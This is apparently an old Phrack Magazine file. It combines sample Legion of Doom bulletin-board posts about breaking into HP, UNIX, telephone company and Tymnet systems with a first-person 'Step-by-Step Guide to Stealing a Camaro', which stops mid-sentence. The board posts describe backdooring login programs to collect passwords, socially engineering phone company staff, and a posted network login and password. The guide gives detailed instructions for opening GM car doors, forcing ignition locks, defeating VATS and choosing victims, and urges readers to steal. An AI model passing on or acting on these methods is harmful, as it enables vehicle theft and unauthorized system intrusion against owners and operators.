wrong?(it was a modm company.) Needless to say I was pissed when everyone used it todeath just to see a pretty (canada)..the reason it diconnects is because of where you're calling from..if you call from canda u probably won'T expirence this problem....on the 03110 develnet..same thing cept you have to be at console...there are still somesystems availble from there that r open..here'Sone IBM <-i couldn't hack it so of course I posted that one:-)) C U-->greets from [8lgm]corrupt *** {The HP-3000 Sub-Board} *** 36/41: Woah! Name: Erik Bloodaxe #2 Date: Mon Jan 22 03:36:40 1990 I wasn't ragging on MPE! Not at all, i was just "JOking" about the large numbers of hp-3000 systems around the world and the unbelievable ease in gaining access on one. Geez, read...MPE seems ok, just kinda hard to get used to. I mean, I'm in HUNDREDS of hp's, but until last year I didn't know what to do with them...so they just sat there. UNIX is just as lame security-wise, but On a percentage basis, I have gotten into 85-90% of the HP's I have found, while I've only gotten into abot 50% of the UNIXes I've found. (Look at me grovel before one of the two HP experts I've ever seen...pathetic, isn't it?) Wiz, no offense intended towards your adopted O.S. ->ME *** {UNIX Sub-Board} *** 60/69: both ways Name: Corrupt #114 Date: Mon Feb 05 05:08:25 1990 nice trojans ------------ good security this works both ways....look-out for unixes(and VMS sites) that keep another copy of /etc/passwd (or sysuaf.dat) and everynite rewrite it over the one used for login(some any mods are discovered)..u can alternatly install some security inside likethis for yourself...(hide it in CROn) (or wherever u want on vms:-)) undersytand? I know I'm not clear:-(( but thats works for you sometimes and it'S simple if you know script:-) anyone here into Rapid Fire hacking? *** {Electronic Banking Sub-Board} *** 12/32: Treason & Government Smegma... Name: Erik Bloodaxe #2 Date: Fri Jan 19 02:06:13 1990 It's the Major SS buzzword these days. Treason. If someone is poking around in ANY system they feel is sensitive (although they leave sysdiag unpassworded, or lp password lp, etc..) they will then label you as: "A Serious Threat to National Security!" Give me a break. Hell, I think my association with Par & Phoenix alone is enough to get me the firing squad. I haven't even done anything, but it seems that everything bad that's happened I keep getting brought up, as I know such and such, or I somehow know EVERYTHING about how such and such happened. Well, I've tried my best to be good, and stay out of government things, military things, etc... I've even edited out the "sensitive" things I've run across in the Telenet scanning just for their sense of well being, but if I begin to feel threatened, it's all going out. Unabridged. We will see...I'm already getting nervous...the feds are already pissed that LOD is still kicking, and this bbs must have SLAMMED it into their faces. And I know that the EFT files must have pissed them off as well, although that may or may not have anything to do with this bbs suddenly going back up. Well, I'm not a threat to ANYTHING, except myself maybe. Anyone who knows me knows that. Back me up people. This is my public announcement of not-guilty to any and all crimes against the Security of the United States. So what if I was scanning 2502 a while back? Anyone ever think that it would be in THE INTEREST OF NATIONAL SECURITY to hop into a Soviet system? I thought it would. Par knows what I mean. Hell, The government now seems to think he's a spy, and wants to shoot him. Killing Teenagers for fun is not my idea of constructive problem solving guys. Take an extended course in the ways of the hacker. That education might do you all a world of good. You may even pick up something you missed in your little weekend getaway training seminar in fighting computer crime. When you come and kick in my door, (don't step on the cat), and if you don't blow me away first, maybe I can educate you all a little better on what is REALLY GOING ON! (This message posted for the Secret Service & CERT, et al. whomever is posing on here, or reading this via Mentor's & My own Data Taps) ->ME *** {Phone Co. Computers Sub-Board} *** 3/46: LMOS Name: Acid Phreak #8 Date: Tue Jan 09 17:56:23 1990 The most recent LMOS interlude was one in my local area. Got the host processor (an IBM 3270) off Predictor. Overall, a very handy tool to add to your telco 'collectables'. The FE's of course were PDP 11/70s using MLT for reference. Aw thit.. lookit all dem Hicaps. --ap (advanced phreaking) 6/46: ICRIS Name: Phiber Optik #6 Date: Wed Jan 10 16:37:27 1990 Not to nitpick, but an LMOS CP is an IBM S370 (3270 is an SNA, used to get to BANCS through LOMS for instance). CRIS, as mentioned, the Customer Record Information System is a dandy little IBM system whose main purpose is to house customer records. There are a small handful of "CRIS" systems, like LCRIS (Local), and ICRIS (Integrated, which should be noted is used by the Residential Service Center). Here in NYNEX, the only way to reach these systems (we obviously aren't hardwired hackers) is through BANCS, a bisync network. BANCS is not direct dialable, but IS available through a 3270 link on the LOMS system, used by LDMC (LAC or FACS, depending where you live). And LOMS IS accessible. A host of systems are also available through FACS (which can be reached through LOMS on BANCS) such as CIMAP, LMOS, SOP, TIRKS, the COSMOS-PREMISE interface, etc. So as you can see, rather than going after any specific system, going after the RIGHT system will pay off greatly (LOMS in this example). Oh, waitta-minnit, those mentioned systems are off of BANCS, sorry. You can reach FACS on BANCS, and access a couple 'o things like some of those mentioned, COSMOS (certain wire centers only), etc. OK, enough rambling. Let's hear someone else's input. Phiber Optik Legion Of Doom! $LOD$ ____________________________________________________________________________ *** {The Twilight Zone BBS (203), Sysop: The Marauder} *** *** {NOTE: All messages from 1985 unless stated otherwise} *** [MSG #12 OF 22]: INWATS & X-LATIONS FROM: THE MARAUDER DATE: MAY 08 {1985} Under CCIS, INWATS (800's) are handled completely different from the older method (the old method i don't completely uderstand, but it translated somehow based on it's own prefix & suffix). under ccis on the other hand, inwats #'s are handled in the following manner: when the 800 number reaches your toll office, a query is made to the 'INWATS DATABASE', (the master database being at the KC RNOCS I believe), i believe each RNOC (regional network operations center, of wich there are 12, one for each region), has their own database (which is updated on a regular basis). a query is made (via a CCIS link) to the inwat's database, and a POTS (plain old telephone service, just a plain 10 digit ddd telephone number, ie: npa+pre+suffix), and the POTS number is pulsed out from the toll center and your call is completed just like a normal ddd (direct distance dialing) call, talthough it was noted that the call was an 800 at the origination (your) toll office, so and you are not charged foor the call.. with this in mind, it's a simple matter for the inwat's database that handles your reigon to return a translation that differs from another reigons translation, for example say fred phreak in new jersey places a call to LDX extender service at 800-XXX-3333, upon reaching his toll center, the toll center quereys the inwat's database that handles new jersey, and a POTS translation is returned which for obvious reasons would be the closest port to him, so let's say the translation was (201)-XXX-4455, the toll office upon recieving this would proceed to complete the call, and fred phreak would be connected to LDX at (201)-XXX-4455.. continued next.. <1-22, ^12> [?/HELP]: [MSG #13 OF 22]: ABOVE CONT'D FROM: THE MARAUDER DATE: MAY 08 now, on the other hand let's say bill phreak in california calls the LDX extender service at (800)-XXX-3333 (same number fred called from NJ), his regions inwat's database may return a completely different POTS x-lation say (213)-XXX-1119, again being ldx's closest port to bill phreaks toll center.. utilizing ccis, and inwat's databases, other clever things are possible for example, as you all know ALLIANCE teleconfrencing is unavailable on weekends, here's how that works: when you dial 0-700-XXX-1000, that number is intercepted at TSPS and translated into a corresponding WAT'S number, for this example, we'll say it translates to (800)-XXX-1003 (white plains), and forwarded from tsps to a toll center, the toll center upon recieving the 800-XXX-1003, queries it's inwat's database and a POTS translation is returned say 914-XXX-6677, which is the DN (Directory Number) for the bridge-center. now on a weekend, the inwat's database, instead of returning 914-XXX-6677 may return 914-XXX-0077, which would terminate at a recording saying alliance is not reachable on weekends.., that's why everyone is alway's interested in the 'ALLIANCE TRANSLATIONS'. Because if you have the x-lation you can simply use a blue box to route yourself directly to the bridgecenter and bypass the whole tanslation procedure.. any questions, please post.. The Marauder Legion of Doom! ____________________________________________________________________________ *** {Black Ice Private (703) BBS Message Base Sample} *** *** {Black Ice had a VERY restrictive user base as shown in the} *** *** {included userlist. The quality of the messages was excellent} *** %> Sub-board: Advanced Telecommunications %> SubOp: ANI Failure %> Messages: 100 %> Files: 0 %> Message: 32 of 100 %> Title: 800 xlations %> When: 12/16/88 at 2:45 am %> Left by: ANI Failure [SubOp] [Level: 8] You can get them from a 4ess or some work centers like RNOC and RWC (good luck, have a dialback).. Or from ONAC in Kansas City (816). The Operations Network Adminstration Center is the focal point for 800 services in the AT&T network. ONAC works in conjuction with the AT&T WATS centers (I think there are 3?) and 800 service co-ordinators to do operations, adminstration, and maintenance on the 800 number network. You can reach the WATS centers phree of charge with a 959 plant test number in the correct NPAs (I know 914 has one). I think it was 959-5000 but that might be wrong. The tech. term for an 800 xlation is a plant test number. This does not have to be pots, but can be other system codes like 122, 195, 196, 123, etc. The only type of 800 number that terminates in POTS is a READYLINE 800 number (AT&T). I don't know about sprint, mci, etc. though. A good topic for investigation though, thankx for the idea! If you have access to a 4e (does anyone on her have this? If so I'll trade anything I have for a 4e), you can type this in to translate a number: well....i can't find the right notebook. it is somethink like: TEST:DSIG;INWATS 800 nxx xxxx! This does a Direct Signaling (DSIG) message into the 4E which commands the 4E to pull the 800 internal number from the network control point (NCP) over CCIS links. The 4E you are on must be included in the service area of that 800 number though, i.e. someone in the area served by that 4E would have to be able to dial it in order for the 4E to have the xlation. So if the 4E is not in the right area it will say 'NON SUBSCRIBED' or something of that nature. Oh, I just remembered, there is an AT&T work group named DSAC (Direct Signaling Admin. Center) that performs direct signaling messages into switches and things. If you want the DSAC #, I can provide it..I don't think too many phreaks have their number so they might be worth engineering. Oh - the 800 xlation input message into the 4E was social engineered a long time ago by The Marauder and Phucked Agent 04 from an RWC. But, thanks to a fuck up by The Executioner and friends, the RWCs became very tight lipped...it only takes 1 fuckup... Um, I have gotten translations from the customer before, posing as AT&T and giving them bs about 'MLT has found a potential trouble in your circuit' (haha) and we need your translation number. I only did this once since I have never had any major need to pull 800 xlations. But that will work in some cases if a human answers. Or if you can get the terminating company name/location, you can keep engineering and narrow down the locations of the xlation (say within their centrex group or something) and then (ughh..dangerous and slow) scan for the number, or do more engineering for it, etc... There is an easier way to get 800 translations but I swore not to tell anyone (that was the conditions of me getting the info) from a certain AT&T dept and a certain support system...if you want a translation in an AT&T area I will try to get it for you though....so leave mail or post and maybe I can help.. ANI-F legion of 800 numberz ____________________________________________________________________________ *** {UNIX Sub-Board} *** %> Sub-board: UNIX %> SubOp: The Prophet %> Messages: 99 %> Files: 1 %> Message: 5 of 99 %> Title: getty, login %> When: 12/16/88 at 6:19 pm %> Left by: The Urvile [Level: 8] for getty, just check and see if the first entry is , where that is your back door, of sorts. the init program will have to be a bit (?) larger than the original, considering that you'll have to put in the stuff to make it set up your environment & exec /bin/sh. login, on the other hand, can put a backdoor in the gpass() routine, which can conveniently write the passwds to a file. not too useful to have lots of passwds in an already backdoored system, you say? bull. there are lots of southern bell systems i've gotten into by using the same passwds as the hacked system. also, what if they remove the backdoor? too bad, it'll take you an hour or so to put the source up & modify it again. one thing that i've been thinking about: on a system, backdoor getty, login, (for the reasons cited above), and something like 'date', to check 1) if root is using the program, and 2) to see if your handy dandy login has been erased, and put it back if 3) a day or so has elapsed from the last call of the 'date'. well, i thought it was a good idea. much better than using cron & whatever to put a username in the passwd file. encryption on cosmos: it's strange, to be sure. i tried putting a 404 cosmos passwd on your 602 cosmos. The user id's were different, the versions of cosmos were different, i think, but the username was the same. has anyone ever seen ANY (no matter how old) cosmos login source? incidentally, is anyone doing anything on sbdn of late? scanning for addresses is generally a bad idea. *** {SPCS/OSS Information Sub-Board} *** *** {Stored Program Control Systems / Operations Support Systems} *** %> Sub-board: SPCS/OSS Information %> SubOp: ANI Failure %> Messages: 97 %> Files: 1 %> Message: 19 of 97 %> Title: DMS %> When: 12/28/88 at 10:20 am %> Left by: Epsilon [Level: 8] I found out some things about DMS if anyone's interested. I only spent a little while looking around, but I managed to figure out that the DMS does indeed have a sort of tree structure. I haven't figured out the structure of TABLES yet, but I kind of know how the rest works. Watch.. Ok, from the > you can enter tasks, (I prefer to call them toolboxes because they're like little tools you can run to perform different things.) For instance, you have one called LOGUTIL which is some sort of utility that keeps tabs on various things, and you can view the logs kept. After you have entered LOGUTIL, you can type LIST LOGUTIL and it'll spool out commands. You can also type LIST LOGS to see a list of logs that are kept. The next thing I was fooling with was SERVORD, which is obviously some type of Service Order processing software. This toolbox is much friendlier, as it does include the help command, and it provides help on the syntax of each command. Unfortunately, it does not give each parameter for each command. I'm sure that would take up quite a lot of space. I think you're going to need a manual to really do anything cool with SERVORD, but hey.. Sorry if you people knew all of this already. I guess I'll keep posting about it as I learn more. Sheesh. Lame post. Epsilon ____________________________________________________________________________ *** {Userlist as of Mid-May it seems} *** %> Black Ice Private User List <% Name Level Status Posts Last on ===============------------------=====------======-------=====-----=======-- System Operator 11 Sysop 33 5/16/89 The Mentor 11 Sysop 59 5/16/89 Epsilon 8 Charter 106 5/8/89 The Prophet 8 Charter 59 5/15/89 ANI Failure 8 Charter 220 5/6/89 The Urvile 8 Charter 71 5/4/89 Doc Cypher 8 Charter 56 5/13/89 Lex Luthor 8 Charter 21 5/10/89 The Leftist 8 Charter 20 5/14/89 Erik Bloodaxe 8 Charter 75 5/17/89 Empty Promise 8 Charter 16 5/5/89 Generic 1BED5 8 Charter 46 5/16/89 Skinny Puppy 8 Charter 93 4/23/89 Jester Sluggo 8 Charter 32 5/13/89 Red Eye 8 Charter 31 5/2/89 The Marauder 8 Charter 9 5/12/89 Ferrod Sensor 8 Charter 10 3/30/89 ____________________________________________________________________________ *** {Tymnet (Packet Switching Network) Sub-Board} *** %> Sub-board: Tymnet %> SubOp: Lex Luthor %> Messages: 48 %> Files: 0 %> Message: 36 of 48 %> Title: isis and elf %> When: 3/25/89 at 12:37 am %> Left by: Lex Luthor [Level: 8] I believe ANI was correct about the acronym for ISIS. Internally Switched Interface System I think it is the go between from the engine to the node code. Kind of like how assembly is the go between my apple and basic. ELF - Engine Load Facility. This is a program that transfers and loads code into a TYMNET Engine node. ISIS has slots, in each slot a program (node code) can run. This node code is different for different tasks. I should clarify the above, only one 'application' ie: gateway, tymcom, whatever, can run on isis, and usually is found on slot 0. But other programs can be run on other slots. Programs that allow you to log into the slot and do things. like DDT - Dynamic Debugging Tool. All this and more will be explained in my upcoming (hopefully) file on Tymnet called-- Anatomy of a Packet Switching Network: MDC's TYMNET. inter-link cleared from VALTDNET (C) H9 N4067 to TYMNET (C) H5981 N7347 inter-link cleared from H1 N2010 TESTNET to H1 N2200 BUBBNET inter-link cleared from TYMNET (F) H5277 N6420 to BUBBNET (F) H15 N2324 inter-link cleared from AKNET to TYMNET inter-link cleared from TYMNET to AKNET inter-link cleared from TRWNET to PUBLIC TYMNET inter-link cleared from PUBLIC TYMNET to TRWNET please log in: DECLOD Password: DECLODH Interlink established from TYMNET to TSN-NET Please log in: Gomer T. Geekster --Lex %> Message: 44 of 48 %> Title: ontyme II %> When: 4/4/89 at 1:15 am %> Left by: Lex Luthor [Level: 8] The system used for setting up the DECLOD acct was TYMVALIDATE which isn't exactly the same as NETVAL but close. Be careful with ONTYME II, since it automatically updates ALL files you read. So if you read some files in that persons' personal directory, they can see that either someone has their acct/pass or someone is using IMITATE and reading their stuff. Me and Skinny Puppy are working on a way to defeat this.... Lex %> Message: 47 of 48 %> Title: INTL TYMNET %> When: 4/21/89 at 1:17 pm %> Left by: Skinny Puppy [Level: 8] International Tymnet - how many of you have seen tymnet claiming that it serves over 65 countries, but don't really belive it? well, they do, sort of. There is a tymnet-europe called Mcdonnell Douglas Information Systems (MDIS). While I don't have any dialups for it, I have X.121 addresses in France and BeNeLuxKG. once you get there, you can type HELP and glean alot of what is going on. The interesting thing is that a lot of things that say ACCESS NOT PERMITTED from regular tymnet are actually european addresses and can be used on MDIS. for instance, ROMA (Italian for ROME), ESAIRS, and EURONET (which is a host selector for american public timesharing systems). While there doesn't seem to be a lot of european hosts, I am sure that if everyone on here pulled up all their old tymnet-hack sheets where they had things listed as ANP (My abbreviated for ACCESS NOT PERMITTED) and tried a few we could find something new. Right now, I will only give out my French MDIS gateway - It is 208092020029. Figure out how to get there yourself. If you DO find anything interesting, leave me mail, and we can trade. I already have some internal MDIS systems there, if I can just figure out how to use them. Coming Soon to a Board not so near to you: NISNET (tymnet-japan) and the Carribean tymnets. Until then, ASSIMILATE Skinny Puppy 21 april 1989 _____________________________________________________________________________ %> Sub-board: Vocal Hacking %> SubOp: ANI Failure %> Messages: 45 %> Files: 0 %> Message: 3 of 45 %> Title: Operator engineering %> When: 12/6/88 at 12:43 am %> Left by: Ferrod Sensor [Level: 8] To answer ANIF's question, I have been doing some TSPS/TOPS engineering lately for a variety of purposes, one of which is a bit far fetched but has possibilities. I am trying to find a way to possibly freeze an operator console (the method I am trying is actually simpler than it sounds). It involves getting the op to connect to a short circuite test code, either by ACS (key) or by OGT (outgoing trunk) outpulsing sequence. There area a few flaws in this though, the main one being the more than likely possibility of the Op simply releasing the console position (even though the short circuit, when dialed, cannot be hang up on, the caller must wait for it to time out (about three minutes or so).If this was the case, then the result could be the Operator having an inaccessible outgoing line for a short period of time, which wouldn't affect much with the actuall console..The things I tried recently with this didn't result in much, but if I take into account TOPS/TSPS RTA (Remote Trunking Arrangements) setups (where a caller from one area code, with a 0+ or 0- call, may be connected to an operator in a site in a different NPA. Test codes are different, even in exchanges, so an operator site in a diffeerent NPA wouldn't be affected the same with a different code. The overall purpose to this would be to create a certain condition with the operator network that could be used to gain information when investigated, say by someone from Mtce. engineering or theTOPS/TSPS SCC or equivalents. There are other ways to start an engineer of course, but this is just something that's concrete (meaning you could get people to fish around for info a bit easier than coming in for a random request. This is getting a bit long. I'lll post more later about Operator engineering, something more immediately practical next time. The board looks promising. Ferrod/LOD ______________________________________________________________________________ LOD Communications: Leaders in Engineering, Social and Otherwise ;) Email: lodcom@mindvox.phantom.com Voice Mail: 512-448-5098 Snail Mail: LOD Communications 603 W. 13th Suite 1A-278 Austin, Texas USA 78701 ______________________________________________________________________________ End Sample H/P BBS Messages File LOD Communications: Leaders in Engineering, Social and Otherwise ;) Email: lodcom@mindvox.phantom.com Voice Mail: 512-448-5098 Snail Mail: LOD Communications 603 W. 13th Suite 1A-278 Austin, Texas USA 78701 ==Phrack Magazine== Volume Four, Issue Forty-Three, File 20 of 27 [** NOTE: The following file is presented for informational purposes only. Phrack Magazine takes no responsibility for anyone attempting the actions described within. **] ----------------------------------------------------------------------------- The Step-by-Step Guide to Stealing a Camaro by Spy Ace spyace@mindvox.phantom.com PURPOSE: To describe step-by-step, with specificity, exactly how the average person might accomplish with skill and alacrity, the theft of a motor vehicle, particularly 1982-1993 Chevrolet Camaros, Pontiac Firebirds and similar beasts. MOTIVE: While I am a telecommunications enthusiast, I am also a basically honest, law-abiding working man. In 1989 an individual driving a borrowed automobile struck my only means of transportation, a 1986 Chevrolet Camaro, totalling it. My vehicle was parked and unoccupied at the time. In an amazing feat of legal maneuvering, and after protracted judicial proceedings, all parties involved managed to escape liability and I was left without a car or reimbursement. The insurance companies are lying, cheating scum. As a result, I took matters into my own hands and stole a replacement car. I came to the conclusion that the justice system in this country exists only to protect the strong from the weak, the haves from the have-nots and the rich from the not rich. It has nothing to do with rectifying wrongs. It is therefore incumbent upon all aggrieved parties to seek personal satisfaction when the American legal system fails to provide it. My motive is thus twofold: 1. To see the evil insurance companies screwed some more by sharing my knowledge of car-thieving techniques with those who might apply them. 2. To assist the little man in obtaining justice when he/she may by confronted with a situation similar to mine. BACKGROUND: Before I stole my car, I conducted extensive research and talked to a number of individuals in the automotive repossession field, law-enforcement, and several auto mechanics. I assure the reader that everything contained in this file is true to the best of my knowledge and that I HAVE ACTUALLY DONE WHAT I AM WRITING ABOUT. I am not writing hypothetically; I speak from experience. I urge the reader, if he is serious about stealing a vehicle, to verify my research and find out much of this information for himself. Auto shops at local high schools/community colleges are excellent places to experiment and learn, and auto repossession specialists are invaluable sources of information. ------ So, you've decided to steal a car. How nice. In this article I will be covering in detail exactly how I stole a 1988 Chevrolet Camaro to replace the 1986 of mine that was destroyed by an irresponsible driver. The techniques described herein will work on 1982 thru 1993 Chevy Camaros/Z28s/IROCs/Berlinettas and probably the same years Pontiac Firebirds and Trans Ams. With regard to the Pontiacs I cannot say for certain because I only experimented on Camaro variety cars since that is what I was after. The Pontiacs are very similar, however, and I believe this information to be applicable to them. There are basically only two stages to obtaining possession of a vehicle. First, one must gain actual physical access to the inside of the car and second, one must disable the steering-lock mechanism and activate the ignition. Once these two things have been accomplished, the vehicle is yours, subject to the infuriated efforts of the owner to regain it. It should be noted, of course, that there may be complications associated with either of these steps, such as alarm systems or the factory anti-theft mechanisms. I will deal with both of these in turn. First, gaining entrance to the vehicle. This will require one tool: a 24-inch aluminum "shop" ruler. I tried several and settled on the Pickett brand ACF-24, available in most art/blueprint supply stores. It consists of a 1.25x24x1/16 inch piece of aluminum. For maximum efficiency, it should have two slight bends to it. First, at 14 inches, bend it subtly to about 15 degrees. Then, at 19 inches on the ruler, bend it back so that the two sections are parallel. Like this: N _________________ W + E \_______ S Of course, the angle in this diagram is far too steep. Both angles should only be about 15 degrees. Hopefully, you get the idea. If not, you probably shouldn't be thinking about stealing a car. In any case, if you have succeeded in fashioning this, you are now armed with the only tool necessary to gain keyless entry into your soon-to-be new Camaro. The application of this tool is simple. Walk up to a Chevrolet Camaro of a year described above, position yourself at either door. FIRST: Check to see if the door is unlocked. You'd be surprised. If it isn't, you will need to insert the tool straight down, in between the rubber weather-stripping and the glass, approximately 4-5 inches from the back of the door, directly in line with the door-lock. Insert the tool such that the small section (see above diagram) is thrust down into the door (did I mention that stealing a car is very sexual? Never mind...). The small section of the tool should be bent TOWARDS you as you stand at the car. In the above diagram, north is towards the car, west is straight up in the air, east is straight down towards the inside of the door, and south is towards you as you stand at the car. Got the picture? If not, get a friend to explain it to you. The tool should go in about 16 inches until it catches the lock mechanism. If it goes in further than about 17 inches, withdraw and try again. Drive straight down, don't force, try moving your position an inch to the right or left. Eventually you will feel the lock mechanism. It will be rigid but a little spongy (epitome of GM engineering). Press down hard on the tool and let up. Try the door handle. Does it open? It probably will. If not, drive a little harder and keep trying the door. It will give eventually. WHY THIS WORKS: Well, this works for two reasons. First of all, General Motors is run by a bunch of cheap bastards and their cars are designed by engineers who couldn't find their asses with both hands. Basically, it's a shitty lock mechanism. It was designed shitty and the clods who sell us the piece-of-shit cars couldn't care less if they get stolen so they've never bothered to redesign the damn thing. In order to understand exactly why it works, the curious reader would be well advised to go to his local library and look in a Clymer or Chilton automotive repair manual for 1986 (or thereabouts) Camaro. In Chapter 12 of the Chilton, under "Body" (page 290 of mine) there is a magnificently concise exploded diagram of "Outside door lock assembly" which contains all the relevant information. The lock cylinder itself is connected to some linkage which activates the locking/unlocking mechanism. After a few months of normal use, this linkage develops some "slop" in it due to slight wear of the locking cylinder attachment. By pressing down on the linkage down inside the door, you are activating the (un)locking mechanism directly and there is enough play in the locking cylinder to allow it to give. Take a look at the diagram and you'll understand completely. Once I understood the locking mechanism, the deficiencies therein, and formulated an approach to overcoming it, I practiced on a friend's Camaro about a hundred times. If done properly and carefully, this will in no way harm any part of the car or locking mechanism. Try it on the driver's side first; this is usually the easiest because it has the most wear in the linkage. Then graduate to the passenger side door. Then try it out about a hundred times, then with your eyes closed, then while drunk, then with one hand tied behind your back. In a day or two you'll be able to get into a Camaro in less than ten seconds. A note about alarms: some clever individuals, in an effort to keep their prized vehicles from being stolen by the likes of you, have equipped them with a motion sensor or other devious device which tends to emit a shrill series of tones when aggravated. I suggest that before trying to open someone else's car, you first give it a good rocking back and forth in order to set off any alarm which might be present. Since it is not illegal (though it may be physically dangerous) to rock someone's car, it's always best to try this before actually breaking in. If the alarm screams, go on to some other victim. Personally, I have encountered very few alarms; the "it won't happen to me" attitude is still prevalent. Once you've gained physical entry into the vehicle, you are now ready for Step Two, ignition lock bypass. Unfortunately, this is a difficult step. I did a tremendous amount of research to determine the best way to deal with this problem and have developed an approach. It is by no means the only way to breach the ignition locking mechanism, but in my opinion it is the best. In developing this method I was most interested in several goals. First of all, I wanted an elegant solution; that is, something simple. Minimum tools and work required, and something that worked ALL THE TIME, not 50%. Second, I wanted an approach that could be accomplished quickly (for obvious reasons) and with minimum damage to the vehicle. Ideally, I wanted an attack which would not even be immediately obvious to someone (such as a cop) glancing in my car at a stoplight. Spending 30 minutes tearing apart the steering column might allow you to get the car started, but it won't meet the above criteria: speed, elegance, reliability, invisibility. The problem is that to do this requires a special tool and to get this tool one must either send away for it or have access to a machine shop to fabricate one. Neither of these is quick and easy, but the preparation is well worth it. Here's the basic idea. The General Motors vehicle uses an ignition locking mechanism called a "sidebar." This is basically one nasty piece of hardened fucking steel which blocks the lock cylinder from rotating when a properly-fitting key is not in place. It makes it impossible to simply "shear off the pins" by brute-force turning with a screwdriver or similar device. The solution is to use a tool capable of cracking the lock cylinder housing in which the sidebar sits. The cylinder housing itself is cast aluminum, which is considerably weaker than the sidebar itself, so when the proper force is applied it will be the housing which gives, not the sidebar. But no matter. First, get access to a Camaro, or for this exercise, just about any GM automobile since 1978 (the year they got the bright idea to put a locking screw in to keep people from just ripping the whole ignition lockset right out -- but that's a whole different story...). My favorite place to experiment on cars without being observed (and in fact legally) is to go to a local self-serve auto-wrecking "You Pull It" yard. They have these in many cities around the fruited plains; you pay a buck or two to get in and then go pluck parts from rotting American classics. If you don't drag any parts out, you can basically tear apart all the cars you want for a buck. If you don't have a You-Pluck-It nearby or are philosophically opposed to vehicular cannibalism, then use the method previously described to break into someone's Camaro for this. Once you have access to a GM (preferably a Camaro), get a screwdriver out and pry the outer ring off of the ignition set. The ring I'm talking about is the thing with the two tabs on it for your fingers to turn when you rotate the ignition to start the car. Just pry that sucker off of there -- it comes off very easily as it is affixed by two small gripping tabs. I can usually remove it by hand, but it's easiest to simply pry gently with a screwdriver. After you have pried that off of the ignition set, take a look. You'll see the ignition cylinder (with the keyway), the outer housing, and the actual ignition activation mechanism, which has two slots in it (where the outer ring fit into before you pried it off). This ignition linkage, with the two tabs, is what turns when a fitting key is inserted into the keyway and then turned. Note that in a GM ignition set, a fitting key serves only to withdraw the sidebar to allow the outer ignition mechanism to turn. The problem is to overcome the sidebar which prevents the ignition from turning. Fortunately, there is a tool for this very purpose. It is manufactured by Briggs and Stratton (yes, the lawn mower engine people) who happen to also make the locksets for GM. They make the locks. They make the tool to break the locks. You figure it out. Anyway, this neat little device is called a "GM Force Tool". I got mine from LDM Enterprises in Van Nuys, California (where else?) and it ran me about $90. Their fone number is 800-451-5950 and you should probably tell them that you're in the automotive repossession business if you go to order one of these. If they won't sell you one (because someone at GM read this article and hopped up and down) then simply go down to a local repo man and pay him an extra $25 to order one for you. Most of those guys are pretty sleazy and will do just about anything for a buck. If you have access to a machine shop and are reasonably competent, go ahead and make one. I will attempt a description. Don't feel stupid if you don't get this; it's difficult to describe it in text. Drop me E-mail and I'll send you a .GIF of the fucking thing. Anyway, it looks basically like a socket with very thin walls and two small tabs which fit into where the thumb-ring-thing used to go. You tap it onto the ignition set, into the two slots and the outside walls of the tool fit very snugly around the outside of the locking mechanism to keep it from splitting apart as you turn it. On the other end of the tool is a 1/2 inch square hole for a ratchet. Got the idea? Tap it onto the ignition, attach a healthy sized ratchet and turn slowly but forcefully. After about 30 degrees of turn the sidebar will crack the ignition lock housing and the whole mechanism will freely turn. If you don't understand this, take a look at a GM ignition (sans outer ring) and the facts will become readily apparent. If you have access to a machine shop, it is a simple matter to make one of these tools. Go to your local GM dealer and buy a whole ignition set, snap the outer ring off of there and take your measurements. Remember that the inner wall of the force tool must fit snugly around the lockset in order to keep it from splitting apart. That is why a device with simply two tabs which fit into the ignition linkage will not work (I tried it -- the metal is too soft and tears apart). Seem like too much work? Well, of course it is a bit of work, but preparation is the key! My father always stressed that the most important part of doing a job is having the right tools. The tools in this case are KNOWLEDGE of how all these goofy parts fit together and operate, a properly constructed force tool, and the patience to apply these two components to bring about the desired result. With some practice I was able to circumvent a Camaro ignition in just under 30 seconds. It does very little actual damage to the vehicle ($11.00 for a new ignition set) and in fact the thumb-ring-thing can be jammed back on and a key inserted and it will appear that everything is proper (in case you're pulled over by the local constable). V.A.T.S. -------- Because of the horrendous problems with car theft, particularly of Camaros, GM came up with a neat system boldly dubbed the "Vehicle Anti Theft System". Needless to say, as with most security devices, VATS accomplished little more than being a nuisance to vehicle owners and a minor inconvenience to car thieves. Here's how to defeat it. First, basic theory of operation. The ignition of a VATS equipped vehicle (most 1988 and newer GMs, particularly the Camaros/Firebirds) is the same as the normal GM ignition except that it has an electronic sensor built in which requires activation by a resistor pack built in to the owner's key. There are fifteen possible resistor types, so each different VATS key that you have gives you a 6.7% chance of being capable of activating the ignition. The catch is that if you feed it the wrong one it will kill the ignition for 4 minutes. Thus, if you had a complete set of fifteen VATS keys, it would take you a maximum of one hour to run through them all. This is GM's idea of security: annoy the thief. If you plan to tackle a VATS-equipped car, get a full set of the fifteen VATS keys. They're a few bucks each and you can get them from a locksmith or LDM. Obtain access to your target car in an area and in such circumstances as will allow you to work for an hour relatively undisturbed. In practice, this is not very difficult (more on that later). Once you have access to the vehicle and are satisfied that you can work unobserved, break the ignition lock using your force-tool as described above. Insert your first VATS key blank and attempt to start the vehicle. If it will not activate the ignition, remove the key, wait four minutes and try the next one. Eventually you'll hit it. (Median hit time, of course: 30 minutes). Drive away. Scouting a Victim ----------------- An essential element of stealing a car without getting caught is picking out the right one. Again, preparation is the key. Once you've mastered the necessary techniques, start looking around for a good place to pick up a vehicle. The car thieves that I spoke with told me that their preferred places are mall parking lots at night: there is a lot of activity so you probably won't be noticed lurking around waiting for a good prospect to show up. People usually go into the mall for several hours to buy crap, so you have time to work. Wait until no one is looking and pounce. Once you are inside the vehicle (which, with practice, may be accomplished in 15 seconds) you are home free. No one is going to pay any attention to you screwing around inside the vehicle and you'll be long gone by the time the owner finishes charging a new Salad Shooter on his American Express. Another good place is airport parking lots. While they are often sporadically patrolled, it is in practice a simple matter to drive around until you spy the right vehicle, then pack all your necessary tools into a suitcase and walk from the terminal to the lot like a returning airline passenger. That's how I did it. The car was not reported stolen for over two weeks (it was in the long-term lot), giving me plenty of breathing room. There are numerous other places. Start noting the places that you leave your car: supermarket, movie theater, in front of your house, at work, in a parking garage, etc. Start noticing patterns. That 1988 IROC you see parked in the same place for five hours every Tuesday. When you actually commit the deed, BE PREPARED. Do a dry run. Be calm, work quickly but carefully. Act like you belong where you are -- don't lurk around nervously. Walk right up to the car and steal it. If confronted by someone, try to talk your way out of it. Don't get violent: it's just a thing. A car is not worth hurting someone over. Don't worry about getting caught: most cities can't cope with the crime epidemic and do not bother to do much about auto theft. What Do I Do With It? --------------------- That's up to you. Take it for a joy ride. If you boosted it from an airport lot you can 